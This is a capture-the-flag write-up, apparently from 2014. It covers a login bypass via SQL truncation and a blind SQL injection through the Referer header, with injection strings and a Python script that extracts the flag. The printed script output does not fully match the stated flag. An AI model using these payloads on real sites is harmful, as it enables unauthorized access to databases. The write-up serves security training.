We have got link to the login page. There is an interesting comment in the page source.


It looks like a base64 encoded data. Let’s decode it.

➜  ~  echo 'H4sIAAAAAAAAAAsyTs80LTEu0ssoyc0BACMzGYUNAAAA' | base64 -D | hexdump
0000000 1f 8b 08 00 00 00 00 00 00 00 0b 32 4e cf 34 2d
0000010 31 2e d2 cb 28 c9 cd 01 00 23 33 19 85 0d 00 00
0000020 00

The first 3 bytes of decoded data indicate that it is a gzip-compressed stream.

Let’s decompress it.

➜  ~  echo 'H4sIAAAAAAAAAAsyTs80LTEu0ssoyc0BACMzGYUNAAAA' | base64 -D | gzip -d

Nice, we got address of the register page.

After some unsuccessful attempts to inject something to regpage’s form I saw a hint from organizers:

After this everything became clear. According to the article we need to register user with a login ‘admin (… many spaces)xxx’ and log in with admin / our_password credentials. Gotcha!

Mozilla Firefox 2014-04-20 14-22-52 2014-04-20 14-22-54

The first flag is 67326289.

We were given a link to the feedback page. By this moment I have already had the organizer’s hint about the 2nd flag location.

According to the hint the organizers perform urlencode() of some input parameters. Having replaced referer to “http://ctf.notsosecure.com/9128938921839838/f33db4ck_flag/submit.php%27 — -“ I’ve got an error message, so it seems that the script writes urlencoded page’s referer into the database.
Mozilla Firefox 2014-04-20 15-00-44 2014-04-20 15-00-51
With referer “http://ctf.notsosecure.com/9128938921839838/f33db4ck_flag/submit.php’), (‘1’, (select flag from flag) ) — -“ I got no errors, so we have table flag with column flag.

Now the question is how to get it. Using load_file/INTO OUTFILE I have accomplished nothing. I decided to get flag step by step using “SUBSTRING” mysql function and comparation with a digit (remind you in this CTF flags consist of digits). So, using referer like

http://ctf.notsosecu.../submit.php'), ('1',  (select '1' UNION ALL SELECT flag FROM flag WHERE SUBSTRING(flag, $j, 1) = '$i' )) -- -

we can got the flag. Let’s consider this query in more detail. By using “WHERE” we compare the $i-th symbol with $j. Thus, if the conditions are met, we will return the flag. In conjunction with the “SELECT ‘1’ UNION” we will get 2 rows, if the conditions are and 1 otherwise. Since in obtaining more than 1 line we get an mysql error, we can sort out the flag by analyzing the answer (returned an mysql error or not). This is Blind-SQL injection. Here’s a script that help us to capture the flag:

#!/usr/bin/env python2.7
import urllib2
url = "http://ctf.notsosecure.com/9128938921839838/f33db4ck_flag/submit.php"
flag = ""
for i in xrange(1, 10):
    print "Part %d" % i
    for j in xrange(0, 10):
        ref = "http://ctf.notsosecure.com/9128938921839838/f33db4ck_flag/submit.php'), ('1',  (" + \
              "SELECT '1' UNION ALL SELECT flag FROM flag WHERE SUBSTRING(flag, %d, 1) = '%d' )) -- -" % (i, j)
        req = urllib2.Request(url)
        req.add_header('Referer', urllib2.quote(ref))
        res = urllib2.urlopen(url=req, timeout=30000).read()
        if res.find('Error Occured') != -1:
            print("%d: yep" % j)
            flag += str(j)
            print("%d:" % j)
print("Flag: %s" % flag)


Part 1
1: yep
Part 2
3: yep
Flag: 1362390

The second flag is 1362390.

Thanks for your attention :)